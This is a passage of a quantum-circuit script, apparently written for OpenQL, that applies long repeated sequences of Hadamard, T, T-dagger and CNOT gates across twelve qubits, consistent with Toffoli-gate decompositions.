k.gate('cnot',[7,1])
k.gate('tdag',[7])
k.gate('tdag',[1])
k.gate('t',[2])
k.gate('cnot',[2,1])
k.gate('cnot',[7,2])
k.gate('cnot',[1,7])
k.gate('h',[2])
k.gate('h',[3])
k.gate('t',[8])
k.gate('t',[2])
k.gate('t',[3])
k.gate('cnot',[2,8])
k.gate('cnot',[3,2])
k.gate('cnot',[8,3])
k.gate('tdag',[2])
k.gate('cnot',[8,2])
k.gate('tdag',[8])
k.gate('tdag',[2])
k.gate('t',[3])
k.gate('cnot',[3,2])
k.gate('cnot',[8,3])
k.gate('cnot',[2,8])
k.gate('h',[3])
k.gate('h',[4])
k.gate('t',[10])
k.gate('t',[3])
k.gate('t',[4])
k.gate('cnot',[3,10])
k.gate('cnot',[4,3])
k.gate('cnot',[10,4])
k.gate('tdag',[3])
k.gate('cnot',[10,3])
k.gate('tdag',[10])
k.gate('tdag',[3])
k.gate('t',[4])
k.gate('cnot',[4,3])
k.gate('cnot',[10,4])
k.gate('cnot',[3,10])
k.gate('h',[4])
k.gate('h',[9])
k.gate('t',[3])
k.gate('t',[11])
k.gate('t',[9])
k.gate('cnot',[11,3])
k.gate('cnot',[9,11])
k.gate('cnot',[3,9])
k.gate('tdag',[11])
k.gate('cnot',[3,11])
k.gate('tdag',[3])
k.gate('tdag',[11])
k.gate('t',[9])
k.gate('cnot',[9,11])
k.gate('cnot',[3,9])
k.gate('cnot',[11,3])
k.gate('h',[9])
k.gate('h',[11])
k.gate('t',[2])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,2])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('tdag',[10])
k.gate('cnot',[2,10])
k.gate('tdag',[2])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('cnot',[10,2])
k.gate('h',[11])
k.gate('h',[10])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[10])
k.gate('cnot',[1,0])
k.gate('cnot',[10,1])
k.gate('cnot',[0,10])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[10])
k.gate('cnot',[10,1])
k.gate('cnot',[0,10])
k.gate('cnot',[1,0])
k.gate('h',[10])
k.gate('h',[11])
k.gate('t',[2])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,2])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('tdag',[10])
k.gate('cnot',[2,10])
k.gate('tdag',[2])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('cnot',[10,2])
k.gate('h',[11])
k.gate('h',[9])
k.gate('t',[3])
k.gate('t',[11])
k.gate('t',[9])
k.gate('cnot',[11,3])
k.gate('cnot',[9,11])
k.gate('cnot',[3,9])
k.gate('tdag',[11])
k.gate('cnot',[3,11])
k.gate('tdag',[3])
k.gate('tdag',[11])
k.gate('t',[9])
k.gate('cnot',[9,11])
k.gate('cnot',[3,9])
k.gate('cnot',[11,3])
k.gate('h',[9])
k.gate('h',[11])
k.gate('t',[2])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,2])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('tdag',[10])
k.gate('cnot',[2,10])
k.gate('tdag',[2])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('cnot',[10,2])
k.gate('h',[11])
k.gate('h',[10])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[10])
k.gate('cnot',[1,0])
k.gate('cnot',[10,1])
k.gate('cnot',[0,10])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[10])
k.gate('cnot',[10,1])
k.gate('cnot',[0,10])
k.gate('cnot',[1,0])
k.gate('h',[10])
k.gate('h',[11])
k.gate('t',[2])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,2])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('tdag',[10])
k.gate('cnot',[2,10])
k.gate('tdag',[2])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('cnot',[10,2])
k.gate('h',[11])
k.gate('h',[8])
k.gate('t',[9])
k.gate('t',[11])
k.gate('t',[8])
k.gate('cnot',[11,9])
k.gate('cnot',[8,11])
k.gate('cnot',[9,8])
k.gate('tdag',[11])
k.gate('cnot',[9,11])
k.gate('tdag',[9])
k.gate('tdag',[11])
k.gate('t',[8])
k.gate('cnot',[8,11])
k.gate('cnot',[9,8])
k.gate('cnot',[11,9])
k.gate('h',[8])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[3])
k.gate('t',[11])
k.gate('cnot',[3,10])
k.gate('cnot',[11,3])
k.gate('cnot',[10,11])
k.gate('tdag',[3])
k.gate('cnot',[10,3])
k.gate('tdag',[10])
k.gate('tdag',[3])
k.gate('t',[11])
k.gate('cnot',[11,3])
k.gate('cnot',[10,11])
k.gate('cnot',[3,10])
k.gate('h',[11])
k.gate('h',[3])
k.gate('t',[7])
k.gate('t',[2])
k.gate('t',[3])
k.gate('cnot',[2,7])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('tdag',[2])
k.gate('cnot',[7,2])
k.gate('tdag',[7])
k.gate('tdag',[2])
k.gate('t',[3])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('cnot',[2,7])
k.gate('h',[3])
k.gate('h',[2])
k.gate('t',[6])
k.gate('t',[1])
k.gate('t',[2])
k.gate('cnot',[1,6])
k.gate('cnot',[2,1])
k.gate('cnot',[6,2])
k.gate('tdag',[1])
k.gate('cnot',[6,1])
k.gate('tdag',[6])
k.gate('tdag',[1])
k.gate('t',[2])
k.gate('cnot',[2,1])
k.gate('cnot',[6,2])
k.gate('cnot',[1,6])
k.gate('h',[2])
k.gate('h',[1])
k.gate('t',[4])
k.gate('t',[5])
k.gate('t',[1])
k.gate('cnot',[5,4])
k.gate('cnot',[1,5])
k.gate('cnot',[4,1])
k.gate('tdag',[5])
k.gate('cnot',[4,5])
k.gate('tdag',[4])
k.gate('tdag',[5])
k.gate('t',[1])
k.gate('cnot',[1,5])
k.gate('cnot',[4,1])
k.gate('cnot',[5,4])
k.gate('h',[1])
k.gate('h',[2])
k.gate('t',[6])
k.gate('t',[1])
k.gate('t',[2])
k.gate('cnot',[1,6])
k.gate('cnot',[2,1])
k.gate('cnot',[6,2])
k.gate('tdag',[1])
k.gate('cnot',[6,1])
k.gate('tdag',[6])
k.gate('tdag',[1])
k.gate('t',[2])
k.gate('cnot',[2,1])
k.gate('cnot',[6,2])
k.gate('cnot',[1,6])
k.gate('h',[2])
k.gate('h',[3])
k.gate('t',[7])
k.gate('t',[2])
k.gate('t',[3])
k.gate('cnot',[2,7])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('tdag',[2])
k.gate('cnot',[7,2])
k.gate('tdag',[7])
k.gate('tdag',[2])
k.gate('t',[3])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('cnot',[2,7])
k.gate('h',[3])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[3])
k.gate('t',[11])
k.gate('cnot',[3,10])
k.gate('cnot',[11,3])
k.gate('cnot',[10,11])
k.gate('tdag',[3])
k.gate('cnot',[10,3])
k.gate('tdag',[10])
k.gate('tdag',[3])
k.gate('t',[11])
k.gate('cnot',[11,3])
k.gate('cnot',[10,11])
k.gate('cnot',[3,10])
k.gate('h',[11])
k.gate('h',[8])
k.gate('t',[9])
k.gate('t',[11])
k.gate('t',[8])
k.gate('cnot',[11,9])
k.gate('cnot',[8,11])
k.gate('cnot',[9,8])
k.gate('tdag',[11])
k.gate('cnot',[9,11])
k.gate('tdag',[9])
k.gate('tdag',[11])
k.gate('t',[8])
k.gate('cnot',[8,11])
k.gate('cnot',[9,8])
k.gate('cnot',[11,9])
k.gate('h',[8])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[3])
k.gate('t',[11])
k.gate('cnot',[3,10])
k.gate('cnot',[11,3])
k.gate('cnot',[10,11])
k.gate('tdag',[3])
k.gate('cnot',[10,3])
k.gate('tdag',[10])
k.gate('tdag',[3])
k.gate('t',[11])
k.gate('cnot',[11,3])
k.gate('cnot',[10,11])
k.gate('cnot',[3,10])
k.gate('h',[11])
k.gate('h',[3])
k.gate('t',[7])
k.gate('t',[2])
k.gate('t',[3])
k.gate('cnot',[2,7])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('tdag',[2])
k.gate('cnot',[7,2])
k.gate('tdag',[7])
k.gate('tdag',[2])
k.gate('t',[3])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('cnot',[2,7])
k.gate('h',[3])
k.gate('h',[2])
k.gate('t',[6])
k.gate('t',[1])
k.gate('t',[2])
k.gate('cnot',[1,6])
k.gate('cnot',[2,1])
k.gate('cnot',[6,2])
k.gate('tdag',[1])
k.gate('cnot',[6,1])
k.gate('tdag',[6])
k.gate('tdag',[1])
k.gate('t',[2])
k.gate('cnot',[2,1])
k.gate('cnot',[6,2])
k.gate('cnot',[1,6])
k.gate('h',[2])
k.gate('h',[1])
k.gate('t',[4])
k.gate('t',[5])
k.gate('t',[1])
k.gate('cnot',[5,4])
k.gate('cnot',[1,5])
k.gate('cnot',[4,1])
k.gate('tdag',[5])
k.gate('cnot',[4,5])
k.gate('tdag',[4])
k.gate('tdag',[5])
k.gate('t',[1])
k.gate('cnot',[1,5])
k.gate('cnot',[4,1])
k.gate('cnot',[5,4])
k.gate('h',[1])
k.gate('h',[2])
k.gate('t',[6])
k.gate('t',[1])
k.gate('t',[2])
k.gate('cnot',[1,6])
k.gate('cnot',[2,1])
k.gate('cnot',[6,2])
k.gate('tdag',[1])
k.gate('cnot',[6,1])
k.gate('tdag',[6])
k.gate('tdag',[1])
k.gate('t',[2])
k.gate('cnot',[2,1])
k.gate('cnot',[6,2])
k.gate('cnot',[1,6])
k.gate('h',[2])
k.gate('h',[3])
k.gate('t',[7])
k.gate('t',[2])
k.gate('t',[3])
k.gate('cnot',[2,7])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('tdag',[2])
k.gate('cnot',[7,2])
k.gate('tdag',[7])
k.gate('tdag',[2])
k.gate('t',[3])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('cnot',[2,7])
k.gate('h',[3])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[3])
k.gate('t',[11])
k.gate('cnot',[3,10])
k.gate('cnot',[11,3])
k.gate('cnot',[10,11])
k.gate('tdag',[3])
k.gate('cnot',[10,3])
k.gate('tdag',[10])
k.gate('tdag',[3])
k.gate('t',[11])
k.gate('cnot',[11,3])
k.gate('cnot',[10,11])
k.gate('cnot',[3,10])
k.gate('h',[11])
k.gate('h',[9])
k.gate('t',[3])
k.gate('t',[11])
k.gate('t',[9])
k.gate('cnot',[11,3])
k.gate('cnot',[9,11])
k.gate('cnot',[3,9])
k.gate('tdag',[11])
k.gate('cnot',[3,11])
k.gate('tdag',[3])
k.gate('tdag',[11])
k.gate('t',[9])
k.gate('cnot',[9,11])
k.gate('cnot',[3,9])
k.gate('cnot',[11,3])
k.gate('h',[9])
k.gate('h',[11])
k.gate('t',[2])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,2])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('tdag',[10])
k.gate('cnot',[2,10])
k.gate('tdag',[2])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('cnot',[10,2])
k.gate('h',[11])
k.gate('h',[10])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[10])
k.gate('cnot',[1,0])
k.gate('cnot',[10,1])
k.gate('cnot',[0,10])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[10])
k.gate('cnot',[10,1])
k.gate('cnot',[0,10])
k.gate('cnot',[1,0])
k.gate('h',[10])
k.gate('h',[11])
k.gate('t',[2])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,2])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('tdag',[10])
k.gate('cnot',[2,10])
k.gate('tdag',[2])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('cnot',[10,2])
k.gate('h',[11])
k.gate('h',[9])
k.gate('t',[3])
k.gate('t',[11])
k.gate('t',[9])
k.gate('cnot',[11,3])
k.gate('cnot',[9,11])
k.gate('cnot',[3,9])
k.gate('tdag',[11])
k.gate('cnot',[3,11])
k.gate('tdag',[3])
k.gate('tdag',[11])
k.gate('t',[9])
k.gate('cnot',[9,11])
k.gate('cnot',[3,9])
k.gate('cnot',[11,3])
k.gate('h',[9])
k.gate('h',[11])
k.gate('t',[2])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,2])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('tdag',[10])
k.gate('cnot',[2,10])
k.gate('tdag',[2])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('cnot',[10,2])
k.gate('h',[11])
k.gate('h',[10])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[10])
k.gate('cnot',[1,0])
k.gate('cnot',[10,1])
k.gate('cnot',[0,10])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[10])
k.gate('cnot',[10,1])
k.gate('cnot',[0,10])
k.gate('cnot',[1,0])
k.gate('h',[10])
k.gate('h',[11])
k.gate('t',[2])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,2])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('tdag',[10])
k.gate('cnot',[2,10])
k.gate('tdag',[2])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('cnot',[10,2])
k.gate('h',[11])
k.gate('h',[8])
k.gate('t',[9])
k.gate('t',[11])
k.gate('t',[8])
k.gate('cnot',[11,9])
k.gate('cnot',[8,11])
k.gate('cnot',[9,8])
k.gate('tdag',[11])
k.gate('cnot',[9,11])
k.gate('tdag',[9])
k.gate('tdag',[11])
k.gate('t',[8])
k.gate('cnot',[8,11])
k.gate('cnot',[9,8])
k.gate('cnot',[11,9])
k.gate('h',[8])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[3])
k.gate('t',[11])
k.gate('cnot',[3,10])
k.gate('cnot',[11,3])
k.gate('cnot',[10,11])
k.gate('tdag',[3])
k.gate('cnot',[10,3])
k.gate('tdag',[10])
k.gate('tdag',[3])
k.gate('t',[11])
k.gate('cnot',[11,3])
k.gate('cnot',[10,11])
k.gate('cnot',[3,10])
k.gate('h',[11])
k.gate('h',[3])
k.gate('t',[7])
k.gate('t',[2])
k.gate('t',[3])
k.gate('cnot',[2,7])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('tdag',[2])
k.gate('cnot',[7,2])
k.gate('tdag',[7])
k.gate('tdag',[2])
k.gate('t',[3])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('cnot',[2,7])
k.gate('h',[3])
k.gate('h',[2])
k.gate('t',[6])
k.gate('t',[1])
k.gate('t',[2])
k.gate('cnot',[1,6])
k.gate('cnot',[2,1])
k.gate('cnot',[6,2])
k.gate('tdag',[1])
k.gate('cnot',[6,1])
k.gate('tdag',[6])
k.gate('tdag',[1])
k.gate('t',[2])
k.gate('cnot',[2,1])
k.gate('cnot',[6,2])
k.gate('cnot',[1,6])
k.gate('h',[2])
k.gate('h',[1])
k.gate('t',[4])
k.gate('t',[5])
k.gate('t',[1])
k.gate('cnot',[5,4])
k.gate('cnot',[1,5])
k.gate('cnot',[4,1])
k.gate('tdag',[5])
k.gate('cnot',[4,5])
k.gate('tdag',[4])
k.gate('tdag',[5])
k.gate('t',[1])
k.gate('cnot',[1,5])
k.gate('cnot',[4,1])
k.gate('cnot',[5,4])
k.gate('h',[1])
k.gate('h',[2])
k.gate('t',[6])
k.gate('t',[1])
k.gate('t',[2])
k.gate('cnot',[1,6])
k.gate('cnot',[2,1])
k.gate('cnot',[6,2])
k.gate('tdag',[1])
k.gate('cnot',[6,1])
k.gate('tdag',[6])
k.gate('tdag',[1])
k.gate('t',[2])
k.gate('cnot',[2,1])
k.gate('cnot',[6,2])
k.gate('cnot',[1,6])
k.gate('h',[2])
k.gate('h',[3])
k.gate('t',[7])
k.gate('t',[2])
k.gate('t',[3])
k.gate('cnot',[2,7])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('tdag',[2])
k.gate('cnot',[7,2])
k.gate('tdag',[7])
k.gate('tdag',[2])
k.gate('t',[3])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('cnot',[2,7])
k.gate('h',[3])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[3])
k.gate('t',[11])
k.gate('cnot',[3,10])
k.gate('cnot',[11,3])
k.gate('cnot',[10,11])
k.gate('tdag',[3])
k.gate('cnot',[10,3])
k.gate('tdag',[10])
k.gate('tdag',[3])
k.gate('t',[11])
k.gate('cnot',[11,3])
k.gate('cnot',[10,11])
k.gate('cnot',[3,10])
k.gate('h',[11])
k.gate('h',[8])
k.gate('t',[9])
k.gate('t',[11])
k.gate('t',[8])
k.gate('cnot',[11,9])
k.gate('cnot',[8,11])
k.gate('cnot',[9,8])
k.gate('tdag',[11])
k.gate('cnot',[9,11])
k.gate('tdag',[9])
k.gate('tdag',[11])
k.gate('t',[8])
k.gate('cnot',[8,11])
k.gate('cnot',[9,8])
k.gate('cnot',[11,9])
k.gate('h',[8])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[3])
k.gate('t',[11])
k.gate('cnot',[3,10])
k.gate('cnot',[11,3])
k.gate('cnot',[10,11])
k.gate('tdag',[3])
k.gate('cnot',[10,3])
k.gate('tdag',[10])
k.gate('tdag',[3])
k.gate('t',[11])
k.gate('cnot',[11,3])
k.gate('cnot',[10,11])
k.gate('cnot',[3,10])
k.gate('h',[11])
k.gate('h',[3])
k.gate('t',[7])
k.gate('t',[2])
k.gate('t',[3])
k.gate('cnot',[2,7])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('tdag',[2])
k.gate('cnot',[7,2])
k.gate('tdag',[7])
k.gate('tdag',[2])
k.gate('t',[3])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('cnot',[2,7])
k.gate('h',[3])
k.gate('h',[2])
k.gate('t',[6])
k.gate('t',[1])
k.gate('t',[2])
k.gate('cnot',[1,6])
k.gate('cnot',[2,1])
k.gate('cnot',[6,2])
k.gate('tdag',[1])
k.gate('cnot',[6,1])
k.gate('tdag',[6])
k.gate('tdag',[1])
k.gate('t',[2])
k.gate('cnot',[2,1])
k.gate('cnot',[6,2])
k.gate('cnot',[1,6])
k.gate('h',[2])
k.gate('h',[1])
k.gate('t',[4])
k.gate('t',[5])
k.gate('t',[1])
k.gate('cnot',[5,4])
k.gate('cnot',[1,5])
k.gate('cnot',[4,1])
k.gate('tdag',[5])
k.gate('cnot',[4,5])
k.gate('tdag',[4])
k.gate('tdag',[5])
k.gate('t',[1])
k.gate('cnot',[1,5])
k.gate('cnot',[4,1])
k.gate('cnot',[5,4])
k.gate('h',[1])
k.gate('h',[2])
k.gate('t',[6])
k.gate('t',[1])
k.gate('t',[2])
k.gate('cnot',[1,6])
k.gate('cnot',[2,1])
k.gate('cnot',[6,2])
k.gate('tdag',[1])
k.gate('cnot',[6,1])
k.gate('tdag',[6])
k.gate('tdag',[1])
k.gate('t',[2])
k.gate('cnot',[2,1])
k.gate('cnot',[6,2])
k.gate('cnot',[1,6])
k.gate('h',[2])
k.gate('h',[3])
k.gate('t',[7])
k.gate('t',[2])
k.gate('t',[3])
k.gate('cnot',[2,7])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('tdag',[2])
k.gate('cnot',[7,2])
k.gate('tdag',[7])
k.gate('tdag',[2])
k.gate('t',[3])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('cnot',[2,7])
k.gate('h',[3])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[3])
k.gate('t',[11])
k.gate('cnot',[3,10])
k.gate('cnot',[11,3])
k.gate('cnot',[10,11])
k.gate('tdag',[3])
k.gate('cnot',[10,3])
k.gate('tdag',[10])
k.gate('tdag',[3])
k.gate('t',[11])
k.gate('cnot',[11,3])
k.gate('cnot',[10,11])
k.gate('cnot',[3,10])
k.gate('h',[11])
k.gate('h',[8])
k.gate('t',[3])
k.gate('t',[11])
k.gate('t',[8])
k.gate('cnot',[11,3])
k.gate('cnot',[8,11])
k.gate('cnot',[3,8])
k.gate('tdag',[11])
k.gate('cnot',[3,11])
k.gate('tdag',[3])
k.gate('tdag',[11])
k.gate('t',[8])
k.gate('cnot',[8,11])
k.gate('cnot',[3,8])
k.gate('cnot',[11,3])
k.gate('h',[8])
k.gate('h',[11])
k.gate('t',[2])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,2])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('tdag',[10])
k.gate('cnot',[2,10])
k.gate('tdag',[2])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('cnot',[10,2])
k.gate('h',[11])
k.gate('h',[10])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[10])
k.gate('cnot',[1,0])
k.gate('cnot',[10,1])
k.gate('cnot',[0,10])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[10])
k.gate('cnot',[10,1])
k.gate('cnot',[0,10])
k.gate('cnot',[1,0])
k.gate('h',[10])
k.gate('h',[11])
k.gate('t',[2])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,2])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('tdag',[10])
k.gate('cnot',[2,10])
k.gate('tdag',[2])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('cnot',[10,2])
k.gate('h',[11])
k.gate('h',[8])
k.gate('t',[3])
k.gate('t',[11])
k.gate('t',[8])
k.gate('cnot',[11,3])
k.gate('cnot',[8,11])
k.gate('cnot',[3,8])
k.gate('tdag',[11])
k.gate('cnot',[3,11])
k.gate('tdag',[3])
k.gate('tdag',[11])
k.gate('t',[8])
k.gate('cnot',[8,11])
k.gate('cnot',[3,8])
k.gate('cnot',[11,3])
k.gate('h',[8])
k.gate('h',[11])
k.gate('t',[2])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,2])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('tdag',[10])
k.gate('cnot',[2,10])
k.gate('tdag',[2])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('cnot',[10,2])
k.gate('h',[11])
k.gate('h',[10])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[10])
k.gate('cnot',[1,0])
k.gate('cnot',[10,1])
k.gate('cnot',[0,10])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[10])
k.gate('cnot',[10,1])
k.gate('cnot',[0,10])
k.gate('cnot',[1,0])
k.gate('h',[10])
k.gate('h',[11])
k.gate('t',[2])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,2])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('tdag',[10])
k.gate('cnot',[2,10])
k.gate('tdag',[2])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('cnot',[10,2])
k.gate('h',[11])
k.gate('h',[7])
k.gate('t',[8])
k.gate('t',[11])
k.gate('t',[7])
k.gate('cnot',[11,8])
k.gate('cnot',[7,11])
k.gate('cnot',[8,7])
k.gate('tdag',[11])
k.gate('cnot',[8,11])
k.gate('tdag',[8])
k.gate('tdag',[11])
k.gate('t',[7])
k.gate('cnot',[7,11])
k.gate('cnot',[8,7])
k.gate('cnot',[11,8])
k.gate('h',[7])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,10])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('tdag',[9])
k.gate('cnot',[10,9])
k.gate('tdag',[10])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('cnot',[9,10])
k.gate('h',[11])
k.gate('h',[9])
k.gate('t',[6])
k.gate('t',[3])
k.gate('t',[9])
k.gate('cnot',[3,6])
k.gate('cnot',[9,3])
k.gate('cnot',[6,9])
k.gate('tdag',[3])
k.gate('cnot',[6,3])
k.gate('tdag',[6])
k.gate('tdag',[3])
k.gate('t',[9])
k.gate('cnot',[9,3])
k.gate('cnot',[6,9])
k.gate('cnot',[3,6])
k.gate('h',[9])
k.gate('h',[3])
k.gate('t',[4])
k.gate('t',[5])
k.gate('t',[3])
k.gate('cnot',[5,4])
k.gate('cnot',[3,5])
k.gate('cnot',[4,3])
k.gate('tdag',[5])
k.gate('cnot',[4,5])
k.gate('tdag',[4])
k.gate('tdag',[5])
k.gate('t',[3])
k.gate('cnot',[3,5])
k.gate('cnot',[4,3])
k.gate('cnot',[5,4])
k.gate('h',[3])
k.gate('h',[9])
k.gate('t',[6])
k.gate('t',[3])
k.gate('t',[9])
k.gate('cnot',[3,6])
k.gate('cnot',[9,3])
k.gate('cnot',[6,9])
k.gate('tdag',[3])
k.gate('cnot',[6,3])
k.gate('tdag',[6])
k.gate('tdag',[3])
k.gate('t',[9])
k.gate('cnot',[9,3])
k.gate('cnot',[6,9])
k.gate('cnot',[3,6])
k.gate('h',[9])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,10])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('tdag',[9])
k.gate('cnot',[10,9])
k.gate('tdag',[10])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('cnot',[9,10])
k.gate('h',[11])
k.gate('h',[7])
k.gate('t',[8])
k.gate('t',[11])
k.gate('t',[7])
k.gate('cnot',[11,8])
k.gate('cnot',[7,11])
k.gate('cnot',[8,7])
k.gate('tdag',[11])
k.gate('cnot',[8,11])
k.gate('tdag',[8])
k.gate('tdag',[11])
k.gate('t',[7])
k.gate('cnot',[7,11])
k.gate('cnot',[8,7])
k.gate('cnot',[11,8])
k.gate('h',[7])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,10])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('tdag',[9])
k.gate('cnot',[10,9])
k.gate('tdag',[10])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('cnot',[9,10])
k.gate('h',[11])
k.gate('h',[9])
k.gate('t',[6])
k.gate('t',[3])
k.gate('t',[9])
k.gate('cnot',[3,6])
k.gate('cnot',[9,3])
k.gate('cnot',[6,9])
k.gate('tdag',[3])
k.gate('cnot',[6,3])
k.gate('tdag',[6])
k.gate('tdag',[3])
k.gate('t',[9])
k.gate('cnot',[9,3])
k.gate('cnot',[6,9])
k.gate('cnot',[3,6])
k.gate('h',[9])
k.gate('h',[3])
k.gate('t',[4])
k.gate('t',[5])
k.gate('t',[3])
k.gate('cnot',[5,4])
k.gate('cnot',[3,5])
k.gate('cnot',[4,3])
k.gate('tdag',[5])
k.gate('cnot',[4,5])
k.gate('tdag',[4])
k.gate('tdag',[5])
k.gate('t',[3])
k.gate('cnot',[3,5])
k.gate('cnot',[4,3])
k.gate('cnot',[5,4])
k.gate('h',[3])
k.gate('h',[9])
k.gate('t',[6])
k.gate('t',[3])
k.gate('t',[9])
k.gate('cnot',[3,6])
k.gate('cnot',[9,3])
k.gate('cnot',[6,9])
k.gate('tdag',[3])
k.gate('cnot',[6,3])
k.gate('tdag',[6])
k.gate('tdag',[3])
k.gate('t',[9])
k.gate('cnot',[9,3])
k.gate('cnot',[6,9])
k.gate('cnot',[3,6])
k.gate('h',[9])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,10])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('tdag',[9])
k.gate('cnot',[10,9])
k.gate('tdag',[10])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('cnot',[9,10])
k.gate('h',[11])
k.gate('h',[8])
k.gate('t',[3])
k.gate('t',[11])
k.gate('t',[8])
k.gate('cnot',[11,3])
k.gate('cnot',[8,11])
k.gate('cnot',[3,8])
k.gate('tdag',[11])
k.gate('cnot',[3,11])
k.gate('tdag',[3])
k.gate('tdag',[11])
k.gate('t',[8])
k.gate('cnot',[8,11])
k.gate('cnot',[3,8])
